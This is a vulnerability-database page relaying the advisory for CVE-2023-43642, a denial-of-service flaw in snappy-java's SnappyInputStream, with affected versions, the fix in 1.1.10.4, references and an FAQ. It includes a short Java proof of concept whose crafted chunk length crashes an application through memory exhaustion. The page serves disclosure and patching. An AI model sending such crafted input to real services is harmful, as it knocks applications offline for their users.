CVE-2023-43642: Missing upper bound check on chunk length in snappy-java
First published: Mon Sep 25 2023(Updated: )
### Summary snappy-java is a data compression library in Java. Its SnappyInputStream was found to be vulnerable to Denial of Service (DoS) attacks when decompressing data with a too-large chunk size. Due to missing upper bound check on chunk length, an unrecoverable fatal error can occur. ### Scope All versions of snappy-java including the latest released version 1.1.10.3. A fix is applied in 1.1.10.4 ### Details While performing mitigation efforts related to [CVE-2023-34455](https://nvd.nist.gov/vuln/detail/CVE-2023-34455) in Confluent products, our Application Security team closely analyzed the fix that was accepted and merged into snappy-java version 1.1.10.1 in [this](https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea) commit. The check on [line 421](https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea#diff-c3e53610267092989965e8c7dd2d4417d355ff7f560f9e8075b365f32569079fR421) only attempts to check if chunkSize is not a negative value. We believe that this is an inadequate fix as it misses an upper-bounds check for overly positive values such as 0x7FFFFFFF (or (2,147,483,647 in decimal) before actually [attempting to allocate](https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea#diff-c3e53610267092989965e8c7dd2d4417d355ff7f560f9e8075b365f32569079fR429) the provided unverified number of bytes via the “chunkSize” variable. This missing upper-bounds check can lead to the applications depending upon snappy-java to allocate an inappropriate number of bytes on the heap which can then cause an java.lang.OutOfMemoryError exception. Under some specific conditions and contexts, this can lead to a Denial-of-Service (DoS) attack with a direct impact on the availability of the dependent implementations based on the usage of the snappy-java library for compression/decompression needs. ### PoC Compile and run the following code: ``` package org.example; import org.xerial.snappy.SnappyInputStream; import java.io.*; public class Main { public static void main(String[] args) throws IOException { byte[] data = {-126, 'S', 'N', 'A', 'P', 'P', 'Y', 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0x7f, (byte) 0xff, (byte) 0xff, (byte) 0xff}; SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data)); byte[] out = new byte[50]; try { in.read(out); } catch (Exception ignored) { } } } ``` ### Impact Denial of Service of applications dependent on snappy-java especially if `ExitOnOutOfMemoryError` or `CrashOnOutOfMemoryError` is configured on the JVM. ### Credits Jan Werner, Mukul Khullar and Bharadwaj Machiraju from Confluent's Application Security team. We kindly request for a new CVE ID to be assigned once you acknowledge this vulnerability.
Credit: security-advisories@github.com security-advisories@github.com security-advisories@github.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| maven/org.xerial.snappy:snappy-java | <=1.1.10.3 | 1.1.10.4 |
| redhat/snappy-java | <1.1.10.4 | 1.1.10.4 |
| IBM IBM® Engineering Requirements Management DOORS | <=9.7.2.7 | |
| IBM IBM® Engineering Requirements Management DOORS Web Access | <=9.7.2.7 | |
| IBM Cloud Pak for Business Automation | <1.1.10.4 |
Never miss a vulnerability like this again
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
Reference Links
- https://github.com/xerial/snappy-java/security/advisories/GHSA-55g7-9cwv-5qfv
- https://github.com/xerial/snappy-java/commit/9f8c3cf74223ed0a8a834134be9c917b9f10ceb5
- https://github.com/xerial/snappy-java/releases/tag/v1.1.10.4
- https://nvd.nist.gov/vuln/detail/CVE-2023-43642
- https://github.com/advisories/GHSA-55g7-9cwv-5qfv (Advisory)
- https://exchange.xforce.ibmcloud.com/vulnerabilities/267079
- https://www.ibm.com/support/pages/node/7124058 (Advisory)
- https://access.redhat.com/security/cve/CVE-2023-34455
- https://access.redhat.com/errata/RHSA-2023:7612
- https://access.redhat.com/errata/RHSA-2023:7700
- https://access.redhat.com/errata/RHSA-2024:3527
- https://bugzilla.redhat.com/show_bug.cgi?id=2241722
Frequently Asked Questions
What is CVE-2023-43642?
CVE-2023-43642 is a vulnerability in the snappy-java data compression library that allows for Denial of Service attacks when decompressing data with a too-large chunk size.
How severe is CVE-2023-43642?
CVE-2023-43642 has a severity rating of 7.5, which is considered high.
Which software is affected by CVE-2023-43642?
The snappy-java library version 1.1.10.3 and earlier is affected by CVE-2023-43642.
How can I fix CVE-2023-43642?
To fix CVE-2023-43642, update your snappy-java library to version 1.1.10.4 or later.
Where can I find more information about CVE-2023-43642?
You can find more information about CVE-2023-43642 on the GitHub page of snappy-java, including the fix and release details.
- collector/github-advisory-latest
- alias/GHSA-55g7-9cwv-5qfv
- alias/CVE-2023-43642
- collector/github-advisory
- agent/type
- agent/first-publish-date
- agent/weakness
- agent/remedy
- agent/author
- agent/severity
- agent/description
- agent/softwarecombine
- collector/ibm-support
- source/IBM
- agent/software-canonical-lookup
- agent/software-canonical-lookup-request
- agent/references
- collector/nvd-api
- collector/nvd-cve
- collector/nvd-index
- collector/redhat-bugzilla
- source/Red Hat
- collector/mitre-cve
- source/MITRE
- agent/title
- agent/last-modified-date
- agent/tags
- agent/event
- package-manager/maven
- vendor/ibm
- canonical/ibm ibm® engineering requirements management doors
- version/ibm ibm® engineering requirements management doors/9.7.2.7
- canonical/ibm ibm® engineering requirements management doors web access
- version/ibm ibm® engineering requirements management doors web access/9.7.2.7
- vendor/xerial
- canonical/xerial snappy-java
- package-manager/redhat